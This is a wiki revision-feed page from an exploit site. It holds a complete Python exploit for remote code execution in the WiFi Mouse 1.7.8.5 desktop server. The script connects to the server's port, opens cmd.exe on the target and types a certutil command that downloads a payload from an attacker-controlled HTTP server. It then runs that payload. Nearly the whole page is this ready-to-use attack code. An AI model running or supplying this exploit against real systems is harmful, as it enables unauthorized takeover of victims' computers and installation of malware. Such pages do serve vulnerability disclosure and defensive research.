https://pwnwiki.com/index.php?action=history&feed=atom&title=WiFi_Mouse_1.7.8.5%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E 2026-04-14T14:45:36Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=WiFi_Mouse_1.7.8.5%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=337&oldid=prev 2021-03-12T08:02:22Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution # Date: 25-02-2021 # Author: H4rk3nz0 # Vendor Homepage: http://necta.us/ # Software Link: http://wif...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution<br /> # Date: 25-02-2021<br /> # Author: H4rk3nz0<br /> # Vendor Homepage: http://necta.us/<br /> # Software Link: http://wifimouse.necta.us/#download<br /> # Version: 1.7.8.5<br /> # Tested on: Windows Enterprise Build 17763<br /> <br /> # Desktop Server software used by mobile app has PIN option which does not to prevent command input.<br /> # Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.<br /> <br /> #!/usr/bin/python<br /> <br /> from socket import socket, AF_INET, SOCK_STREAM<br /> from time import sleep<br /> import sys<br /> import string<br /> <br /> target = socket(AF_INET, SOCK_STREAM)<br /> port = 1978<br /> <br /> try:<br /> rhost = sys.argv[1]<br /> lhost = sys.argv[2]<br /> payload = sys.argv[3]<br /> except:<br /> print(&quot;USAGE: python &quot; + sys.argv[0]+ &quot; &lt;target-ip&gt; &lt;local-http-server-ip&gt; &lt;payload-name&gt;&quot;)<br /> exit()<br /> <br /> <br /> characters={<br /> &quot;A&quot;:&quot;41&quot;,&quot;B&quot;:&quot;42&quot;,&quot;C&quot;:&quot;43&quot;,&quot;D&quot;:&quot;44&quot;,&quot;E&quot;:&quot;45&quot;,&quot;F&quot;:&quot;46&quot;,&quot;G&quot;:&quot;47&quot;,&quot;H&quot;:&quot;48&quot;,&quot;I&quot;:&quot;49&quot;,&quot;J&quot;:&quot;4a&quot;,&quot;K&quot;:&quot;4b&quot;,&quot;L&quot;:&quot;4c&quot;,&quot;M&quot;:&quot;4d&quot;,&quot;N&quot;:&quot;4e&quot;,<br /> &quot;O&quot;:&quot;4f&quot;,&quot;P&quot;:&quot;50&quot;,&quot;Q&quot;:&quot;51&quot;,&quot;R&quot;:&quot;52&quot;,&quot;S&quot;:&quot;53&quot;,&quot;T&quot;:&quot;54&quot;,&quot;U&quot;:&quot;55&quot;,&quot;V&quot;:&quot;56&quot;,&quot;W&quot;:&quot;57&quot;,&quot;X&quot;:&quot;58&quot;,&quot;Y&quot;:&quot;59&quot;,&quot;Z&quot;:&quot;5a&quot;,<br /> &quot;a&quot;:&quot;61&quot;,&quot;b&quot;:&quot;62&quot;,&quot;c&quot;:&quot;63&quot;,&quot;d&quot;:&quot;64&quot;,&quot;e&quot;:&quot;65&quot;,&quot;f&quot;:&quot;66&quot;,&quot;g&quot;:&quot;67&quot;,&quot;h&quot;:&quot;68&quot;,&quot;i&quot;:&quot;69&quot;,&quot;j&quot;:&quot;6a&quot;,&quot;k&quot;:&quot;6b&quot;,&quot;l&quot;:&quot;6c&quot;,&quot;m&quot;:&quot;6d&quot;,&quot;n&quot;:&quot;6e&quot;,<br /> &quot;o&quot;:&quot;6f&quot;,&quot;p&quot;:&quot;70&quot;,&quot;q&quot;:&quot;71&quot;,&quot;r&quot;:&quot;72&quot;,&quot;s&quot;:&quot;73&quot;,&quot;t&quot;:&quot;74&quot;,&quot;u&quot;:&quot;75&quot;,&quot;v&quot;:&quot;76&quot;,&quot;w&quot;:&quot;77&quot;,&quot;x&quot;:&quot;78&quot;,&quot;y&quot;:&quot;79&quot;,&quot;z&quot;:&quot;7a&quot;,<br /> &quot;1&quot;:&quot;31&quot;,&quot;2&quot;:&quot;32&quot;,&quot;3&quot;:&quot;33&quot;,&quot;4&quot;:&quot;34&quot;,&quot;5&quot;:&quot;35&quot;,&quot;6&quot;:&quot;36&quot;,&quot;7&quot;:&quot;37&quot;,&quot;8&quot;:&quot;38&quot;,&quot;9&quot;:&quot;39&quot;,&quot;0&quot;:&quot;30&quot;,<br /> &quot; &quot;:&quot;20&quot;,&quot;+&quot;:&quot;2b&quot;,&quot;=&quot;:&quot;3d&quot;,&quot;/&quot;:&quot;2f&quot;,&quot;_&quot;:&quot;5f&quot;,&quot;&lt;&quot;:&quot;3c&quot;,<br /> &quot;&gt;&quot;:&quot;3e&quot;,&quot;[&quot;:&quot;5b&quot;,&quot;]&quot;:&quot;5d&quot;,&quot;!&quot;:&quot;21&quot;,&quot;@&quot;:&quot;40&quot;,&quot;#&quot;:&quot;23&quot;,&quot;$&quot;:&quot;24&quot;,&quot;%&quot;:&quot;25&quot;,&quot;^&quot;:&quot;5e&quot;,&quot;&amp;&quot;:&quot;26&quot;,&quot;*&quot;:&quot;2a&quot;,<br /> &quot;(&quot;:&quot;28&quot;,&quot;)&quot;:&quot;29&quot;,&quot;-&quot;:&quot;2d&quot;,&quot;'&quot;:&quot;27&quot;,'&quot;':&quot;22&quot;,&quot;:&quot;:&quot;3a&quot;,&quot;;&quot;:&quot;3b&quot;,&quot;?&quot;:&quot;3f&quot;,&quot;`&quot;:&quot;60&quot;,&quot;~&quot;:&quot;7e&quot;,<br /> &quot;\\&quot;:&quot;5c&quot;,&quot;|&quot;:&quot;7c&quot;,&quot;{&quot;:&quot;7b&quot;,&quot;}&quot;:&quot;7d&quot;,&quot;,&quot;:&quot;2c&quot;,&quot;.&quot;:&quot;2e&quot;}<br /> <br /> <br /> def openCMD():<br /> target.sendto(&quot;6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a&quot;.decode(&quot;hex&quot;), (rhost,port)) # openfile /C/Windows/System32/cmd.exe<br /> <br /> def SendString(string):<br /> for char in string:<br /> target.sendto((&quot;7574663820&quot; + characters[char] + &quot;0a&quot;).decode(&quot;hex&quot;),(rhost,port)) # Sends Character hex with packet padding<br /> sleep(0.03)<br /> <br /> def SendReturn():<br /> target.sendto(&quot;6b657920203352544e&quot;.decode(&quot;hex&quot;),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app<br /> sleep(0.5)<br /> <br /> def exploit():<br /> print(&quot;[+] 3..2..1..&quot;)<br /> sleep(2)<br /> openCMD()<br /> print(&quot;[+] *Super fast hacker typing*&quot;)<br /> sleep(1)<br /> SendString(&quot;certutil.exe -urlcache -f http://&quot; + lhost + &quot;/&quot; + payload + &quot; C:\\Windows\\Temp\\&quot; + payload)<br /> SendReturn()<br /> print(&quot;[+] Retrieving payload&quot;)<br /> sleep(3)<br /> SendString(&quot;C:\\Windows\\Temp\\&quot; + payload)<br /> SendReturn()<br /> print(&quot;[+] Done! Check Your Listener?&quot;)<br /> <br /> <br /> def main():<br /> target.connect((rhost,port))<br /> exploit()<br /> target.close()<br /> exit()<br /> <br /> if __name__==&quot;__main__&quot;:<br /> main()<br /> &lt;/pre&gt;</div>

Pwnwiki